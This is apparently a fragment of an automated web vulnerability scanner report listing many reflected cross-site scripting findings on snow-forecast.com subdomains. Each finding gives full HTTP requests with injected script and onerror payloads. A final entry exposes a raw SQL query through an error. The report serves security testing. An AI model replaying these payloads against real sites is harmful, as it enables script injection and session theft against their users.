HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "011042d8a74a0eea65bdaf43b5812132" X-Runtime: 462 Content-Length: 24235 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a01cd"><script>alert(1)</script>b5a4cbb6879 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'a01cd"><script>alert(1)</script>b5a4cbb6879 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b5a19bebbdccb74ac90ed1399f38c33d" X-Runtime: 55 Content-Length: 18096 Set-Cookie: sfcsid=62c0a7710c996eef1dbf11746e3323c3; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9576"><script>alert(1)</script>3763d4ccba7 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Eb9576"><script>alert(1)</script>3763d4ccba7 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "9c5b7de3cbd130b0c481673ac4e15d9e" X-Runtime: 55 Content-Length: 19271 Set-Cookie: sfcsid=b576f49d6f02676cfaf62888fc15438b; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.70. http://se.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93761"><script>alert(1)</script>65b683182f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?93761"><script>alert(1)</script>65b683182f7=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "8ec353fab81239cde01d19f0feacaa42" X-Runtime: 114 Content-Length: 18192 Set-Cookie: sfcsid=efae265515c8f69fb7eef66cf0604e89; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.71. http://se.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13fb8"><script>alert(1)</script>a9260badab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?13fb8"><script>alert(1)</script>a9260badab7=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d551a881e3a5db578911af2d6a48e736" X-Runtime: 58 Content-Length: 27699 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.72. http://se.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea19"><script>alert(1)</script>f7071c68d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?5ea19"><script>alert(1)</script>f7071c68d5d=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "dbce31c2d0a98eca4251c6537b2d546b" X-Runtime: 504 Content-Length: 42511 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:54 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9680"><img%20src%3da%20onerror%3dalert(1)>a93d804e4be was submitted in the REST URL parameter 2. This input was echoed as b9680"><img src=a onerror=alert(1)>a93d804e4be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /collections/vendorsb9680"><img%20src%3da%20onerror%3dalert(1)>a93d804e4be HTTP/1.1 Host: store.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Status: 404 Not Found X-UA-Compatible: IE=Edge,chrome=1 X-Cache: miss X-Runtime: 0.065478 Set-Cookie: _session_id=99fc374310a44115199325602684bd1e; path=/; HttpOnly Cache-Control: no-cache Content-Length: 2494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.74. http://tr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96967"><script>alert(1)</script>4d1439ca23e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?96967"><script>alert(1)</script>4d1439ca23e=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1e76c5cd91148e78580b3f52f8a50a35" X-Runtime: 63 Content-Length: 24359 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload def70"><script>alert(1)</script>94a0ed9113c was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'def70"><script>alert(1)</script>94a0ed9113c HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "08671f8ed86c1a4778cafc16dcba6517" X-Runtime: 50 Content-Length: 18195 Set-Cookie: sfcsid=a76f472098413f0aa84a132cddc643bb; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9737c"><script>alert(1)</script>35334400e8c was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E9737c"><script>alert(1)</script>35334400e8c HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "60905297ad34aeab40cb0a8f46348f43" X-Runtime: 56 Content-Length: 19311 Set-Cookie: sfcsid=26b4eb004bb730e1a15ef1b461e14737; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.77. http://tr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5832"><script>alert(1)</script>3ac32b78344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?e5832"><script>alert(1)</script>3ac32b78344=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "81df54d56af7064ba20501edfeab0612" X-Runtime: 97 Content-Length: 18182 Set-Cookie: sfcsid=4384b045f39d79b88fda2dbb2e53e270; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.78. http://tr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d4f"><script>alert(1)</script>8a9ee4f8def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?f0d4f"><script>alert(1)</script>8a9ee4f8def=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4eba8be69acd821c4f119041030310cb" X-Runtime: 72 Content-Length: 27709 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.79. http://tr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 990b3"><script>alert(1)</script>1bdd82fa708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?990b3"><script>alert(1)</script>1bdd82fa708=1 HTTP/1.1 Host: tr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:14:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "35dce7f6145bd170581e051adc492fcc" X-Runtime: 155 Content-Length: 42805 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:14:10 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.80. http://www.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98180"><script>alert(1)</script>522bd4d206a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?98180"><script>alert(1)</script>522bd4d206a=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.1.10.1297288577; sfcsid=a26c06d23e0901be19d070ea32094f1f
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 21:58:03 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "118722e948809bb1282aec54f4ed4910" X-Runtime: 41 Cache-Control: private, max-age=0, must-revalidate Content-Length: 24319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '"--></style></script><script>alert(0x0005CE)</script> request parameter is copied into the HTML document as plain text between tags. The payload 433b3<script>alert(1)</script>c95c64a7a60 was submitted in the '"--></style></script><script>alert(0x0005CE)</script> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'"--></style></script><script>alert(0x0005CE)</script>433b3<script>alert(1)</script>c95c64a7a60 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.snow-forecast.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eaf5"><script>alert(1)</script>8fce27d7c98 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E2eaf5"><script>alert(1)</script>8fce27d7c98 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sfcsid=a26c06d23e0901be19d070ea32094f1f; __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.3.10.1297288577
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:04:34 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "aad7517e6b8c9cd895a55a621f07e228" X-Runtime: 49 Cache-Control: private, max-age=0, must-revalidate Content-Length: 19885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.83. http://www.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8172b"><script>alert(1)</script>86410f04713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?8172b"><script>alert(1)</script>86410f04713=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw; __utmz=262007119.1297288591.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sfcsid=a26c06d23e0901be19d070ea32094f1f; __utma=262007119.969865198.1297288577.1297288577.1297288577.1; __utmc=262007119; __utmb=262007119.2.10.1297288577
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 21:58:05 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "786f1b4bf6183085be03f4fde9eb1203" X-Runtime: 43 Cache-Control: private, max-age=0, must-revalidate Content-Length: 18786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.84. http://www.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcda"><script>alert(1)</script>6952b24a14b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:02:34 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "0b4c7b42cca923631b0a089278d98f61" X-Runtime: 57 Cache-Control: private, max-age=0, must-revalidate Content-Length: 27756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.85. http://www.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c44"><script>alert(1)</script>63ffc41f183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?89c44"><script>alert(1)</script>63ffc41f183=1 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Courchevel Ski Re ...[SNIP]... <a href="http://hu.snow-forecast.com/resorts/Courchevel?89c44"><script>alert(1)</script>63ffc41f183=1"> ...[SNIP]...
The value of the size_id request parameter is copied into the HTML document as plain text between tags. The payload c91fe<script>alert(1)</script>c0fdc2d1de3 was submitted in the size_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sbban/image.php?size_id=833c91fe<script>alert(1)</script>c0fdc2d1de3&resort=135 HTTP/1.1 Host: www.snow-forecast.com Proxy-Connection: keep-alive Referer: http://www.snow-forecast.com/resorts/Courchevel Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: last_loc=135; __gads=ID=cc928eff2cc47df6:T=1297288507:S=ALNI_MbdH5VwVHJYOLwaNwsH1okrwCmJGw
DB Error: syntax error select * from sbbanners_ads where (resort=135 or resort is null) and (size_id=833c91fe<script>alert(1)</script>c0fdc2d1de3 or size_id= -1) and approved='yes' and paid='yes' and alowban_size ='yes' and ( (sbtype=1 and credits> ...[SNIP]...